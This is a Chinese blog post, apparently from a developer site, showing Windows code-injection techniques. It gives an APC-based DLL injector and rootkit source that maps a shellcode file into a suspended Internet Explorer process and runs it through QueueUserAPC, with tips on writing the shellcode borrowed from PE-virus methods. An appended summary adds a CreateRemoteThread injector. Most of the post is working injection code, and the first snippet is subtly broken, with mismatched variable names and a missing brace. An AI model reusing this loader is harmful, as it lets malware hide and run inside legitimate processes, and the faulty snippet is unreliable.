Code Inject的新技术

本文介绍了两种DLL注入方法,一种是一年前发现的方法,利用VirtualAllocEx和WriteProcessMemory分配内存并写入DLL路径,通过QueueUserAPC调用LoadLibrary加载DLL;另一种来自Rootkit,使用自定义的MyMapViewOfFileEx函数映射文件到进程地址空间,并通过QueueUserAPC安排执行映射的shellcode。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

inject的一般方法是:CreateRemoteThread;今天在Rootkit上看到一个新的方法,让我想起1年前我看到过的类似方法,大家一起看看这种方法吧:
1) 1年前我所看到的方法
    DWORD  dwResult;
    HANDLE hThread;
    HANDLE hProcess;
    char   szDllName[] = "c://MyDll.dll";
    int    nLen = strlen(szDllName) + 1;
    PVOID  pData= VirtualAllocEx(hProcess,
                                
NULL, 
                                 nLen, 
                                 MEM_COMMIT | MEM_TOP_DOWN, 
                                 PAGE_READWRITE);
    if (param != NULL)
    {
        if (WriteProcessMemory(hProcess, 
                               pData,
                               (LPVOID)szDllName,
                               len,
                               &ret))
        {
            for (DWORD p = 0; p < NumberOfThreads; p++) //寻找适当的线程
            {
                hThread = OpenThread(THREAD_ALL_ACCESS, 0, ThreadId[p]);
                if (hThread != 0)
                {
                    InjectDll(hProcess, hThread, (DWORD)pData);
                    CloseHandle(hThread);                                  
                }
            }
    } 

    void InjectDll(HANDLE hProcess, HANDLE hThread, DWORD param)
    {
        QueueUserAPC( (PAPCFUNC)GetProcAddress(GetModuleHandle
                      ("kernel32.dll"), "LoadLibraryA"),  
                      hThread,  
                      (DWORD)param )
            
    }


2) Rootkit上的方法,下面代码转自
http://www.rootkit.com/newsread.php?newsid=715

#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
                SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;


LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh,
        DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )   
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;


// Convert the offset
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// Save the size and base
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// Convert flags to NT Protection Attributes
if (dwDesiredAccess & FILE_MAP_WRITE)
{
  Protect  = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
  Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
  Protect = PAGE_WRITECOPY;
}
else
{
  Protect = PAGE_NOACCESS;
}

// Map the section
Status = NtMapViewOfSection(hFileMappingObject,
        hProcess,
        &ViewBase,
        0,
        0,
        &SectionOffset,
        &ViewSize,
        ViewShare,
        0,
        Protect);
if (!NT_SUCCESS(Status))
{
  // We failed
  return NULL;
}

// Return the base
    return ViewBase;
}



int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( "ntdll.dll" );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");


// Getting a shellcode, use whatever you want
HANDLE hFile = CreateFile ("C://shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);


// Starting target process
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess ("C://Programme//Internet Explorer//iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);


// Injecting the shellcode into target process address space
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);


// Create a new APC which will be executed at first when the thread resume
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);

ResumeThread (pi.hThread);


CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}

总结:
1 巧妙的应用了QueueUserAPC和Apc Queue,上述LoadLibrary动作和MappedFile的shellcode在目标线程被调度为运行状态的时候执行.

2 还记得APC Queue吗?
线程被重新调度为运行状态的时候会检查当前的Apc Queue,只有Queue中所有的Routine被执行完毕后,才执行线程原来被中断(入口)的代码.

3 第二个例子要自己写shellcode,关于如何定位函数,参见PE病毒写法,不要从栈地址找Kenel32的地址了,从TEB中的SEH地址找,默认(最外层)的处理Routine在Kenel32.dll中......
  
### 代码注入技术概述 代码注入是一种将外部代码引入目标应用程序的技术,使得这段代码能够在目标应用的上下文中运行。这种技术广泛应用于合法用途如调试、性能分析以及扩展功能;同时也可能被滥用于恶意目的,比如植入病毒或窃取数据。 #### Windows平台下的C/C++实现远程代码注入实例 对于Windows操作系统而言,可以利用WinAPI来完成这一过程。下面给出的是一个简单的例子,在此案例中选择了`lyshark.exe`作为宿主程序[^2]: ```cpp #include <windows.h> #include <stdio.h> int main() { DWORD pid; HANDLE hProcess, hThread; // 获取目标进程ID (这里假设已知) printf("Enter the PID of lyshark.exe: "); scanf("%lu", &pid); // 打开目标进程并获取句柄 hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (!hProcess) { printf("Failed to open process.\n"); return -1; } // 准备要注入的目标函数地址 LPVOID pLoadLibrary = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"); // 创建内存空间并将DLL路径写入其中 char dllPath[] = "c:\\path\\to\\your\\dll.dll"; LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); WriteProcessMemory(hProcess, pRemoteMem, dllPath, sizeof(dllPath), NULL); // 创建新线程执行加载库操作 CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteMem, 0, NULL); CloseHandle(hProcess); } ``` 上述代码展示了如何创建一个新的线程去调用`LoadLibrary()`从而载入指定位置上的动态链接库(DLL),进而实现了跨进程边界的逻辑控制转移。 #### 使用Inject-Assembly简化代码注入流程 除了直接编写复杂的底层接口外,还有更简便的方法可供选择。例如,Inject-Assembly就是一个专为此设计的框架,它不仅支持通过编程手段定义待注入的内容,而且还配备了易于使用的命令行界面,极大地降低了入门门槛[^3]。 #### Webpack环境中的JavaScript代码热替换方案 针对前端开发领域,则有像inject-loader这样的工具能够很好地满足需求。这类插件可以在构建过程中自动向模块间插入额外的功能性脚本片段,帮助开发者快速迭代测试版本而无需每次都重新编译整个项目文件树结构[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值